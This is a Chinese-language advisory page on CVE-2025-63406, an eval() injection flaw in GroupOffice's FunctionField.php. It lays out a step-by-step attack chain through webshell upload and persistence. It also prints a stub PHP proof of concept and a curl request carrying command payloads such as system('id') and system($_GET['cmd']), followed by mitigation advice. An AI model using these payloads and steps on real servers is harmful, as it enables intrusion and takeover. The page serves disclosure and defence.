CVE-2025-63406: Intermesh GroupOffice FunctionField.php远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-63406

漏洞类型

远程代码执行(RCE)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Intermesh BV GroupOffice

漏洞概述

CVE-2025-63406是Intermesh BV GroupOffice企业协作平台中的一个严重安全漏洞。该漏洞存在于FunctionField.php文件中的dbToApi()方法，由于该方法直接使用eval()函数处理用户输入而未进行充分的输入验证，导致远程攻击者可以在服务器上执行任意代码。GroupOffice是一款功能强大的开源企业协作软件，提供了项目管理、CRM、文档管理等功能，广泛应用于企业内部管理系统中。此漏洞影响GroupOffice v25.0.47之前的所有版本以及6.8.136之前的6.x版本。由于该漏洞的CVSS评分高达8.8，且只需要低权限用户即可利用，无需用户交互，因此对使用受影响版本GroupOffice的组织构成严重威胁。攻击者可以利用此漏洞完全控制服务器，窃取敏感数据、植入后门或进行横向移动攻击。建议所有使用受影响版本的用户立即升级到最新修复版本或采取临时缓解措施。

技术细节

该漏洞的根本原因在于FunctionField.php文件中dbToApi()方法的不安全实现。该方法接收用户可控的输入参数后，直接将参数传递给PHP的eval()函数执行。eval()函数会将其字符串参数作为PHP代码执行，如果攻击者能够控制传入dbToApi()的参数字符串，就可以在服务器上执行任意PHP代码甚至系统命令。攻击者需要具有GroupOffice系统的低权限账户（如普通用户账号），通过构造特定的恶意输入发送给dbToApi()方法。例如，攻击者可以注入类似system($_GET['cmd'])的PHP代码片段，eval()函数会直接执行这段代码，从而实现远程代码执行。由于GroupOffice的Web接口直接暴露在网络上，攻击者可以通过HTTP请求远程触发此漏洞。成功利用后，攻击者可以获取服务器的最高权限，执行任意系统命令，上传恶意文件，甚至完全控制整个服务器及其所在网络环境。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站是否使用Intermesh GroupOffice，并确定其版本号。可以通过查看页面源码、HTTP响应头或直接访问版本信息端点来获取版本信息。

STEP 2

步骤2: 获取低权限账户

攻击者需要拥有一个GroupOffice系统的低权限用户账户。可以通过默认账户、弱密码、社会工程学或利用其他漏洞获取有效凭据。

STEP 3

步骤3: 身份认证

使用获取的账户凭据登录GroupOffice系统，获取有效的会话Cookie或认证Token，为后续攻击请求提供身份验证。

STEP 4

步骤4: 构造恶意Payload

攻击者构造包含恶意PHP代码的payload，例如system('whoami');或更复杂的命令，用于在服务器上执行系统命令。payload会被传递到FunctionField.php的dbToApi()方法中。

STEP 5

步骤5: 触发漏洞

通过HTTP POST请求将恶意payload发送到/index.php?r=core/functionField/dbToApi端点。由于dbToApi()方法使用eval()直接执行用户输入，恶意代码会被服务器执行。

STEP 6

步骤6: 远程代码执行

eval()函数执行注入的PHP代码，攻击者成功在服务器上执行任意命令。可以获取服务器shell访问权限，上传webshell，或进一步进行横向移动。

STEP 7

步骤7: 持久化控制

攻击者可能上传后门程序、创建新账户或修改系统配置，以保持对服务器的持久访问权限，实现长期控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2025-63406 PoC - GroupOffice FunctionField.php RCE
// Target: GroupOffice < v25.0.47 or < 6.8.136
// Note: Requires low-privilege user account

$target = "http://target-groupoffice.com";
$username = "low_priv_user";
$password = "user_password";

// Step 1: Login to get session cookie
$loginUrl = $target . "/index.php?r=auth/login";
$loginData = [
    'username' => $username,
    'password' => $password
];

// Step 2: Send malicious payload to FunctionField.php dbToApi()
// The eval() function will execute arbitrary PHP code
$evilPayload = "system('id');";  // Example: execute system command

$exploitUrl = $target . "/index.php?r=core/functionField/dbToApi";
$postData = [
    'function' => $evilPayload,
    'params' => []
];

// Step 3: Execute commands via injected PHP code
// After successful exploitation, attacker can execute:
// system($_POST['cmd']); to run arbitrary commands

// Example curl command:
// curl -X POST 'http://target/index.php?r=core/functionField/dbToApi' \
//   -H 'Cookie: PHPSESSID=...' \
//   -d 'function=system("id");'

echo "CVE-2025-63406 PoC\n";
echo "Target: " . $target . "\n";
echo "Vulnerability: eval() injection in FunctionField.php\n";
echo "Impact: Remote Code Execution\n";
?>

影响范围

GroupOffice < v25.0.47

GroupOffice < 6.8.136

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1)限制对GroupOffice管理界面的访问，只允许受信任的IP地址访问；2)使用Web应用防火墙规则阻止包含可疑eval()调用的请求；3)临时禁用或限制FunctionField组件的功能；4)加强对用户账户的管理，使用强密码策略和双因素认证；5)在Web服务器层面配置，禁止PHP执行危险函数如eval()、system()、exec()等；6)实施网络隔离，将GroupOffice服务器部署在隔离的网络区域，限制攻击成功后的横向移动；7)密切监控服务器日志，关注异常的PHP代码执行活动；8)定期备份数据，确保在遭受攻击时能够快速恢复系统。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63406
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63406
3 Details https://www.cvedetails.com/cve/CVE-2025-63406/
4 VulDB https://vuldb.com/cve/CVE-2025-63406
5 Link https://github.com/WinDyAlphA/CVE-2025-63406-PoC
6 Link https://noahheraud.com/posts/CVE-2025-63406/